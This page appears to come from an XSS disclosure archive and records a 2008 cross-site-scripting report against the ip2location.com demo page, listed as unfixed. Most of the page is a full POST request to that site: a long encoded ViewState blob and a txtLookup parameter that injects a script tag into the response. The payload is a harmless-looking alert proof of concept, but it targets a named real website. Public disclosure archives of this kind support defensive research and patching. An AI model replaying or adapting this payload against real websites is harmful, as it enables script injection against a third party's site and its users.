Advertisements:
Security researcher RoMeO, has submitted on 14/02/2008 a cross-site-scripting (XSS) vulnerability affecting www.ip2location.com, which at the time of submission ranked 14646 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 06/04/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 14/02/2008 Date published: 06/04/2008 Fixed? Mail us!Status:  UNFIXED
Author: RoMeO Domain: www.ip2location.com Category: XSS Pagerank: 14646
URL: http://www.ip2location.com/demo.aspx
POST: __VIEWSTATE=dDw2MDIwNTc2NTQ7dDw7bDxpPDE%2BOz47bDx0PDtsPGk8MT47aTw1PjtpPDc%2BO2k8OT47aTwyMT47aTwyMz47 aTwyNT47PjtsPHQ8O2w8aTwxPjtpPDM%2BO2k8NT47aTw3Pjs%2BO2w8dDxwPGw8VmlzaWJsZTs%2BO2w8bzxmPjs%2BPjs7Pjt0 PHA8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Pjs7Pjt0PHA8bDxWaXNpYmxlOz47bDxvPGY%2BOz4%2BOzs%2BO3Q8cDxsPHNyYz s%2BO2w8aW1hZ2VzL2xvZ2luLmdpZjs%2BPjs7Pjs%2BPjt0PEAwPDs7Ozs7Ozs7Ozs%2BOzs%2BO3Q8cDxwPGw8VGV4dDs%2BO2 w8RmVicnVhcnkgMjAwODs%2BPjs%2BOzs%2BO3Q8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Oz47dDxwPGw8VGV4dDs%2BO2w8XD xUQUJMRSBpZD0iVGFibGU1IiBjZWxsU3BhY2luZz0iMCIgY2VsbFBhZGRpbmc9IjAiIHdpZHRoPSIyMzkiIGJvcmRlcj0iMCJcPg 0KXDxUUlw%2BDQpcPFREXD5cPEEgaHJlZj0iaHR0cDovL3d3dy5pcDJsb2NhdGlvbi5jb20iXD5cPElNRyBoZWlnaHQ9IjE0IiBz cmM9Imh0dHA6Ly93d3cuaXAybG9jYXRpb24uY29tL2ltYWdlcy9zZWFyY2hib3h0aXRsZS5naWYiIHdpZHRoPSIyMzkiIGJvcmRl cj0iMCJcPlw8L0FcPlw8L1REXD4NClw8L1RSXD4NClw8VFJcPg0KXDxURFw%2BDQpcPFRBQkxFIGlkPSJUYWJsZTYiIGNlbGxTcG FjaW5nPSIwIiBjZWxsUGFkZGluZz0iMCIgd2lkdGg9IjEwMCUiIGJvcmRlcj0iMCJcPg0KXDxUUlw%2BDQpcPFREIHZBbGlnbj0i bWlkZGxlIiBhbGlnbj0iY2VudGVyIiB3aWR0aD0iMTA4IiBiYWNrZ3JvdW5kPSJodHRwOi8vd3d3LmlwMmxvY2F0aW9uLmNvbS9p bWFnZXMvc2VhcmNoYm94YmcuZ2lmIiBoZWlnaHQ9IjExMiJcPg0KXDxUQUJMRSBpZD0iVGFibGU3IiBoZWlnaHQ9IjExMiIgY2Vs bFNwYWNpbmc9IjAiIGNlbGxQYWRkaW5nPSIwIiB3aWR0aD0iMTA4IiBib3JkZXI9IjAiXD4NClw8VFJcPg0KXDxURCB2QWxpZ249 Im1pZGRsZSIgYWxpZ249ImNlbnRlciJcPlw8VEVYVEFSRUEgc3R5bGU9IkJPUkRFUi1SSUdIVDogI2ExZDJmZSAxcHggc29saWRc OyBCT1JERVItVE9QOiAjYTFkMmZlIDFweCBzb2xpZFw7IEZPTlQtU0laRTogOXB4XDsgQk9SREVSLUxFRlQ6ICNhMWQyZmUgMXB4 IHNvbGlkXDsgQ09MT1I6ICMzMzMzMzNcOyBCT1JERVItQk9UVE9NOiAjYTFkMmZlIDFweCBzb2xpZFw7IEZPTlQtRkFNSUxZOiBB cmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmXDsgVEVYVC1ERUNPUkFUSU9OOiBub25lIg0KbmFtZT0iaXBhZGRyZXNzZXMiIHJv d3M9IjUiIHdyYXA9Ik9OIiBjb2xzPSIxNSJcPlw8L1RFWFRBUkVBXD4gXDxJTlBVVCB0eXBlPSJpbWFnZSIgaGVpZ2h0PSIxNiIg d2lkdGg9Ijc2IiBzcmM9Imh0dHA6Ly93d3cuaXAybG9jYXRpb24uY29tL2ltYWdlcy9zZWFyY2hib3hidXR0b24uZ2lmIlw%2BDQ pcPC9URFw%2BDQpcPC9UUlw%2BDQpcPC9UQUJMRVw%2BDQpcPC9URFw%2BDQpcPFREIHZBbGlnbj0idG9wIiB3aWR0aD0iMTMxIi BoZWlnaHQ9IjExMiJcPlw8QSBocmVmPSJodHRwOi8vd3d3LmlwMmxvY2F0aW9uLmNvbSJcPlw8SU1HIGhlaWdodD0iMTEyIiBzcm M9Imh0dHA6Ly93d3cuaXAybG9jYXRpb24uY29tL2ltYWdlcy9zZWFyY2hib3hpbmZvLmdpZiIgd2lkdGg9IjEzMSIgYm9yZGVyPS IwIlw%2BXDwvQVw%2BXDwvVERcPg0KXDwvVFJcPg0KXDwvVEFCTEVcPg0KXDwvVERcPg0KXDwvVFJcPg0KXDwvVEFCTEVcPg0KOz 4%2BOzs%2BO3Q8cDxsPFRleHQ7PjtsPFw8SUZSQU1FIFNSQz0iaHR0cDovL3d3dy5pcDJsb2NhdGlvbi5jb20vaWIxLyIgV0lEVE g9IjQwNCIgSEVJR0hUPSI4NiIgTUFSR0lOV0lEVEg9IjEiIFNDUk9MTElORz0ibm8iIEZSQU1FQk9SREVSPSIwIlw%2BXDwvSUZS QU1FXD47Pj47Oz47dDxwPGw8VGV4dDs%2BO2w8XDxJRlJBTUUgU1JDPSJodHRwOi8vd3d3LmlwMmxvY2F0aW9uLmNvbS9pYjIvIi BXSURUSD0iMjA0IiBIRUlHSFQ9IjE2MiIgTUFSR0lOV0lEVEg9IjEiIFNDUk9MTElORz0ibm8iIEZSQU1FQk9SREVSPSIwIlw%2B XDwvSUZSQU1FXD47Pj47Oz47Pj47Pj47bDxidG5GaW5kTG9jYXRpb247Pj4%3D&txtLookup=%3A+%3Cscript%3Ealert%281%2 9%3C%2Fscript%3E&btnFindLocation.x=35&btnFindLocation.y=16&ipaddresses=
Click here to view the mirror
Buy XSS Attacks book from Amazon!
XSS Attacks
Cross Site Scripting Exploits and Defense 		Buy Detecting Malice book from RSnake
Website Fraud Loss Prevention
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.